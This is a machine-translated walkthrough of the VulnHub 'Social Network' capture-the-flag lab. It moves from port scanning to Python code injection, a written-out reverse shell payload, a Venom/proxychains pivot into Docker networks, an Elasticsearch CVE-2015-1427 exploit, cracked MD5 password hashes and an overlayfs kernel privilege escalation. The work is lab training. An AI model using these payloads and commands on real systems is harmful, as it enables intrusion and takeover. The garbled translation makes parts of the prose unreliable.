Let’s hit the target 01


0x00 introduction to target

Target address:BoredHackerBlog: Social Network ~ VulnHub

Target difficulty: medium

Recommended virtual machine: VirtualBox

0x01 content introduction

  • Attack methods involved
    • Host discovery
    • Port scan
    • Service discovery
    • Path crawling
    • Code injection
    • Shell script
    • Intranet information collection
    • Intranet penetration
    • Vulnerability exploitation
    • Password cracking
    • Local rights raising
    • Attack code modification

0x02 environment construction

Download the target.ovaImport the file into VirtualBox

Ensure that the target and Kali are in the same network segment

Kali IP address:

0x03 host discovery

Because the target and Kali are in the same network segment, the host discovery technology of layer 2 is preferred

Execute command:sudo arp-scan -l


A total of 4 IP addresses are scanned, of which the first three are the IP addresses that VirtualBox needs to use for normal operation, so there is only the last IP address: the IP of the target

After getting the target’s ip:, scan the full port to detect which ports and services are opened on the target

Execute command:sudo nmap -p-


From the scanning results, it is concluded that the target has opened two ports, and then the service version of these two ports is detected

Execute command:sudo nmap -p22,5000 -sV


From the scanning results, it can be concluded that

  • 22Port is runningOpenSSHService, and the target should beUbuntuoperating system

  • 5000Port is runninghttpdServices, viaWerkzeugKeyword search shows that this is based onpythonconductwebThe underlying framework of development; This means that the programming language environment running on the server side ispython2.7, then it can be used if code execution vulnerabilities are found laterpythonScript toBounce shellTo gain control, etc


Since you are running a web application, open the browser to visit the website to see if there is a default page. If there is a default page, then see if there is an injection point



It can be seen that this is a social networking site. Through simple security detection, it is found that there are no obvious known vulnerabilities in the default page, and there are no cross site scripting vulnerabilities, so there is no gain

When infiltrating web applications, a routine operation that must be done is: Web application path discoveryTo see whether the hidden path of those hidden pages contains the submission point of the function or other vulnerabilities

There are many crawling tools for web application paths, such aswindowsPlatformMitsurugi , used on Kali this timedirsearchThis tool

By crawling the web application path, we are likely to find the background address, so we can attack the background, which can help us find the breakthrough point of the target system with great probability

Execute command:dirsearch -u


After scanning, a path is found. Use the browser to access it:


Visit and find that this is a code execution page. Combined with the information collected above, we know that the server is runningpython2.7Programming language environment, so you can try to injectpythonCode to bounce shell

0x04 Python bounce shell

Search with search enginePython bounce shellMany contents can be found, such as:Python bounce shell_ Rebound shell summary_ Hepu’s blog CSDN blog


#The general meaning of the red box part is to create an interactive SH and a TCP connection to, and then redirect the input and output errors of SH to the process occupying port 5555 at

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);  #  Create socket; AF_ INET(TCP/IP – IPv4); SOCK_ Stream (TCP stream)
s.connect(("",5555));  #  IP address and port to connect
os.dup2(s.fileno(),0);  #  os. The dup2 () method is used to copy one file descriptor FD to another fd2
os.dup2(s.fileno(),1);  #  The fileno () method returns an integer file descriptor (FD integer), which can be used for i/o operations of the underlying operating system
os.dup2(s.fileno(),2);  #  Use fileno() to return an integer file descriptor, and use os.dup2 (s.fileno(), 0) to copy the integer file descriptor to the following 0. The three dup2 functions redirect the socket to standard input, standard input, and standard error output successively.
p=subprocess. call(["/bin/sh","-i"]);  #  Subprocess. Call() executes the command provided by the parameter and returns the status of the command, 0 or non-0
                                      #It can be ["/bin/bash", "-i"] or ["/bin/sh", "-i"]

Reference is as follows

Check Kali’s own IP

Execute command:ip a


usencStart listening

Execute command:nc -nvlp 4444


Then execute on the web pagepythonRebound shell code, here only["/bin/sh","-i"]It can run successfully. Pay attention to change the IP address to Kali’s IP address and the port toncListening port

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);


Click the page buttonTest codeAfter that,ncThe listener responded and got a rebound shell


Simply execute the command to view the current path and account permissions


Fortunately, I got itrootPermission, but is it true?

0x05 judge whether it is in the docker container

Dockerfile is a text file used to build images. The text content contains instructions and instructions required to build images one by one.

Dockerfile is usually used as a template file for the standardized deployment of docker container in the production environment and the deployment of the development environment. This template file will contain a series of information about how to import the docker image, how to configure the docker image, what software packages to install, and what service items to modify, etc; As a developer, you can distribute the template file to the deployment personnel of the application, so that you can deploy docker containers in a unified, standardized and consistent mass on the server of the production environment. In a word, dockerfile is a template file for standardized deployment.

uselsI saw it when I orderedDockerfileDocuments, does it mean obtainedrootThe operating system of permission is actually adockerSystem in container

Check it outDockerfileDocument content

Execute command:cat Dockerfile


#docker build -t socnet .
#docker run -td --rm -p 8080:8080 socnet
From python:2.7-alpine \from: pull the image from the docker hub or the local repository as the basic image. Alpine is suitable for the basic image, which is less than 5m
Copy. /app # copy: copy files or directories into containers, similar to add, but without the function of automatic download or decompression
Workdir /app 35; workdir: switch the currently executed working directory
RUN pip install -r requirements. Txt # run: any command will be executed in the new layer above the current image and the results will be submitted. The generated submission image will be used for the next dockerfile
CMD ["Python", "/app/main.py"] \cmd: the command started by the container. If there are multiple commands, the last one shall prevail. You can also provide parameters for entrypoint

reference resources:Access road of dockerfile_ Peithon’s blog CSDN blog_ dockerfile run

You can see thisDockerfileThe content of the file is a standard dockerfile template file, which will be deeper after viewing. This is adockerSystematic suspicion

Real hammer, these are two methods (commands) of a docker container

  1. Method 1 (90%): check whether the root directory of the system exists.dockerenvFile, execute command:ls /.dockerenv


  2. Method 2 (100%): View/proc/1/cgroupFile, execute command:cat /proc/1/cgroup

    If something similar to the following appears, you can be 100% sure that this is adockerContainer system, anddockerThe hash value of the container is placed later

    Reason: after the Linux system is started, the PID 1 represents the initialization ID of the computer system. When the CGroup file that initializes the PID clearly contains the docker image instruction information, it is 100% proof that the current system is a docker container


This is the real hammer. The root account permissions obtained are in the docker container

0x06 intranet host discovery

View the IP address of the current docker container system

Execute command:ip a


Get the IP address:, different from the target IP that launched the attack before:, which further confirms that this is adockerContainer systems, because their IP addresses are different

Now the network segment where the docker container is located can be regarded as the intranet segment,The common idea of the next step is to find out whether there are other hosts in the intranet? If there are other hosts, are there known vulnerabilities? Can these vulnerabilities be used to attack more intranet systems?

The host is found on the intranet. There are no many tools in Kali on the target. UsepingThe command is more appropriate. The subnet mask is 16 bits. Theoretically, there are 65535 IP addresses. It is unrealistic to Ping one by one manually, which requires the help of automated tools,A relatively simple method is to write a script that uses a loop to Ping the specified intranet segment

#Scan - and extract the IP with packet return
for i in $(seq 1 254);do for j in $(seq 1 254);do ping -c 1 172.17.$i.$j | grep "ttl";done;done

Because there are not so many target drones here

Execute command:for i in $(seq 1 10);do ping -c 1 172.17.0.$i | grep "ttl";done


Remove after a scan172.17.0.2It is outside the machine. A total of 2 surviving IP addresses are scanned. Next, you need to172.17.0.1and172.17.0.3Conduct port scanning to see what services are opened on them, whether there are loopholes, and whether they can penetrate

0x07 intranet penetration

Because 172.17 is in the intranet segment, Kali cannot directly access it. To solve this problem, we need to use the intranet penetration technology to connect the network route between Kali and 172.17 intranet

Using venom, we can easily establish a tunnel between Kali and the intranet, and then generate an agent based on this tunnel, so that many tools in Kali can access the intranet of the target through this agent

venomTool GitHub address:GitHub – Dliv3/Venom: Venom – A Multi-hop Proxy for Penetration Testers

Download firstvenomCompress the package into Kali and decompress it


View the version of the target system

Execute command:uname -a


Get the target system isLinux 64Bit, selectvenominagent_linux_x64This program


takeagent_linux_x64This client is transferred to the target system, and the corresponding server is run on this machineadmin_linux_x64

Kali local operationadmin_linux_x64, listening9999port

Execute command:./admin_linux_x64 -lport 9999


The target system needs to obtainvenomClient, and then run the client to connect to the server, so as to establish a tunnel

Start the HTTP service on Kali, and then pass it on the target systemwgetCommand to getagent_linux_x64Client program

Start the HTTP service on Kali and execute the command:python3 -m http.server 80


Target system usagewgetGet client program

Execute command:wget


Give executable permission

Execute command:chmod +x agent_linux_x64


Start the client program, connect to the server, and establish a connection

Execute command:./agent_linux_x64 -rhost -rport 9999



Server startsocksListen


This enables listening on Kali1080Portedsocks5agent

In order for all tools on Kali to hang agents to access the intranet, you also need to useproxychainsThis tool

modifyproxychainsConfiguration file of, configuring agent type, IP, port

Execute command:sudo vim /etc/proxychains4.conf


0x08 intranet port scanning

Use NAMP for intranet IP: port scan

Execute command:proxychains nmap -Pn -sT


The scan results show that the ports 22 and 5000 are open. Scan the service versions of 22 and 5000

Execute command:proxychains nmap -p22,5000 -Pn -sT -sV


The scanning result is familiar, which is exactly the same as the scanning result of

Visit the 5000 port Kali of through the browser

To facilitate switching agents, you can install them in Firefox browserFoxyProxy StandardExtension, extension address:FoxyProxy standard download


FoxyProxy standard extension adds Socks5 proxy




Browser uses proxy


Access Intranet172.17.0.1:5000


Displayed content and previous access The contents displayed are exactly the same, and even the data of manual test can be seen. It shows that is the host machine of, but is the IP for the container intranet, so is the target machine to be attacked

Next, continue to scan the port of

Execute command:proxychains nmap -Pn -sT


The scan result shows that only port 9200 is open. Scan the services running on this port

Execute command:proxychains nmap -p9200 -Pn -sT -sV


According to the scanning results, elasticsearch is running on 9200, and the version is 1.4.2

0x09 Elasticsearch RCE

Elasticsearch has had several very serious vulnerabilities in its historical versions, the most serious of which are some rce remote code execution vulnerabilities

usesearchsploitSearch whether Kali contains known elasticsearch exploit code

Execute command:searchsploit Elasticsearch


The first two in the search results are remote code execution vulnerabilities. You can first copy these two vulnerabilities and try one by one to see whether you can break into elasticsearch server

First, try 36337.py, a vulnerability exploit code, and copy it to the current directory

Execute command:cp /usr/share/exploitdb/exploits/linux/remote/36337.py .


You can simply check this Python script to see how to exploit vulnerabilities


You can see that this script is written in python2

Run this script and execute the code:python2 36337.py


Get the IP of the target to be added later through the prompt

Execute the command again:proxychains python2 36337.py


Soon got the result, try to inputidCommand to view the obtained account permissions

Execute command:id


It was found that the script exited the operation with an error, so we had to find the problem and solve the error. From the prompt information, we can conclude that the number of this vulnerability isCVE-2015-1427

Search with search engineCVE-2015-1427, see how to use it. Reference link:Cve-2015-1427 (groovy sandbox bypass & & Code Execution Vulnerability) – smile 996 – blog Garden (cnblogs.com)


The steps to exploit vulnerabilities are

  1. insert data
  2. Construct the payload with the data just inserted

Now let’s take a look at the vulnerability exploitation code copied from Kali again

Execute command:vim 36337.py


Comparing the payload in the reference link with the payload in the python script, we can find that most of the contents are the same, the only difference is the key in the payload used in the reference linktest#It is inserted into elasticsearch in advance, and the key in payload in Python scriptlupinIf it is not inserted into elasticsearch in advance, it willlupinAfter inserting into elasticsearch, can this Python script run normally? It’s worth trying

useburpsuiteHang up the Socks5 agent, send a post request to elasticsearch, and insert datalupin

Open firstburpsuite


seeburpsuiteProxy port


to configureburpsuiteUsing socks proxy


Configure browser usageburpsuiteagent



Access with browser


takeburpsuiteThe caught request packet is sent toRepeatermodular

Modify the HTTP packet content to insertlupinFormat, click send


After the creation is successful, try to execute the command again:proxychains python2 36337.py


idCommand execution succeeded! Got another onerootAccount, but this is only the root permission of the container system

Execute command:cat /proc/1/cgroup


0x0a kernel vulnerability authorization

After searching for information collected in this container system, a file namedpasswordsFile for

Execute command:ls /


Does it contain a more confidential password? Out of curiosity

Execute command:cat /passwords


It is found that this is indeed an account and password file, with the account number in the front and the hash value of the password in the back

Through the MD5 ciphertext query website on the Internet, the plaintext corresponding to all ciphertexts was queried. Query link:MD5 free online decryption and cracking_ MD5 online encryption -somd5

account number Password (ciphertext) Password (clear text)
john 3f8184a7343664553fcb5337a3138814 1337hack
test 861f194e9d6118f3d942a72be3e51749 1234test
admin 670c3bbc209a18dde5446e5e6c1f1d5b 1111pass
root b3d34352fc26117979deabdf1b9b6354 1234pass
jane 5c158b60ed97c723b673529b8a3cf72b 1234jane

With these accounts and passwords, you can try to log in to the IP address with port 22 open, bearing the brunt10.0.2.15

After a try, I was pleasantly surprised to find the accountjohnCan successfully log in to10.0.2.15Unfortunately, none of the others can

Execute command:ssh [email protected]


Login to the target successfully

account numberjohnAt present, it is the only account that can be used. See if this account can promote itself toroot, if you can, this shooting will be completed

Execute command:sudo -s


Unfortunately not, nosudoPermissions for

If you still want to obtain root permission, it’s nothing more than local authorization

There are many ways to raise rights locally, but the main way is to use kernel vulnerabilities to raise rights

Check the system kernel and execute the command:uname -a


You can see that the kernel version used by the target system is 3.13, a very old version. For such an old version, there are generally kernel vulnerabilities

ReusesearchsploitSearch aboutlinux 3.13Exploit code

Execute command:searchsploit linux 3.13


Search a lot of results, and choose a vulnerability exploitation code with local rights

In the real penetration scenario and in the real project process, many exploit versions may be found in this link, and we need to try on the target system one by one

For example, use37292.cCopy this exploit version to the current directory first

Execute command:cp /usr/share/exploitdb/exploits/linux/local/37292.c .


Check the code of this file

Execute command:vim 37292.c


By checking the description, it is found that this is a C language source code file, which needs to be used before runninggccCompile first

However, execute the command on the target system:gcc


The result shows that GCC is not installed on the target system, so it needs to be compiled on Kali first, and then transferred to the target target machine for operation

Before running any exploit code on the target aircraft, it is strongly recommended to read the exploit code to be executed first

Check the source code again and execute the command:vim 37292.c


Discover by viewing the source code

  1. On page139-147OK, it is executed again through C codegccCommand, willofs-lib.cCompile asofs-lib.soFile, so even if it is compiled in advance on Kali, when running on the target system, it is not installed on the target systemgccIt will still report an error; There are many solutions. The relatively simple and direct way is to modify the source code content, delete the compiled part, and then look for ready-made ones in KaliOfs lib so file
  2. Section148Line, read/tmp/ofs-lib.soFile, so when executing on the target system, you need toofs-lib.soFile intotmpDirectory to successfully read this file

Modify the source code file and delete the original No139-147Line, the modified content is as follows


Compile the modified C source code

Execute command:gcc -o exp 37292.c


Some warnings during compilation are harmless and will not affect the final execution result

Find out whether there is in Kaliofs-lib.sofile

Execute command:locate ofs-lib.so


It turns out that it does exist. Copy it to the current directory

Execute command:cp /usr/share/metasploit-framework/data/exploits/CVE-2015-1328/ofs-lib.so .


Start the HTTP service on Kali and pass through the targetwgetCommand to download these two files

Start the HTTP service and execute the command:python3 -m http.server 80


The target aircraft downloads these two files

Execute command:

  • wget

  • wget


To ensure successful operation, you need toofs-lib.soMove to/tmpDirectory, simply move both files directly to/tmpUnder the directory

Execute command:mv * /tmp


giveexpExecutable permissions

Execute command:chmod +x exp


implementexpProgram, upgrade permissions

Execute command:./exp


Congratulations, successfully upgraded to root authority, and this shooting is successfully completed!

0x0b summary

  • Text overview of shooting process

    1. First perform host discovery, and then perform port scanning and service scanning on the discovered hosts
    2. Found on the target after scanning5000Port runs a web application, try to use the browser to access this web application
    3. There are no known vulnerabilities in the default page of the web application. Next, usedirsearchCommand to probe the web application path
    4. Found one/adminThe path of the background. There is a Remote Code Execution Vulnerability in this background page. Using this vulnerability, a rebound shell of the target system is obtained
    5. But after getting the shell, I found myself trapped in a docker container system. Based on this container system, I found the host of the IP address segment of the intranet
    6. During the discovery of Intranet hosts, two IP addresses were identified:
    7. Then an intranet penetration tunnel was established and openedsocksThe agent scans all ports and services of the host that has been detected to be alive in the intranet
    8. During scanning, it is found that172.17.0.3It’s on9200Port. The corresponding application isElasticsearch
    9. Try rightElasticsearchMake use of existing vulnerabilities and successfully win172.17.0.3This host
    10. Continue to collect information in this host and find a file namedpasswordsfile
    11. Learned from the contents of the documentjohnThe hash value of the account number and password is queried through the online password cracking tool
    12. After getting the account and password, I tried to log in on all hosts with port 22 on the intranet. The final result was that I successfully logged in to the target system
    13. But after logging in successfully, I encountered another problem, account numberjohnJust an ordinary account, Nosudojurisdiction
    14. Have to carry out the operation of raising rights, throughuname -aIt is found that the kernel of the target system is a very old version, and a code for exploiting kernel vulnerabilities is selected
    15. However, this exploit code cannot be performed on the target systemgccTherefore, the source code is modified on Kali and the call is deletedgccCompile part of the code after compilation, and find the dependent binary library file in Kali
    16. These two files are transferred to the target system together. By executing the compiled program on the target system, we finally get therootjurisdiction
  • Video link corresponding to the shooting process:Click to view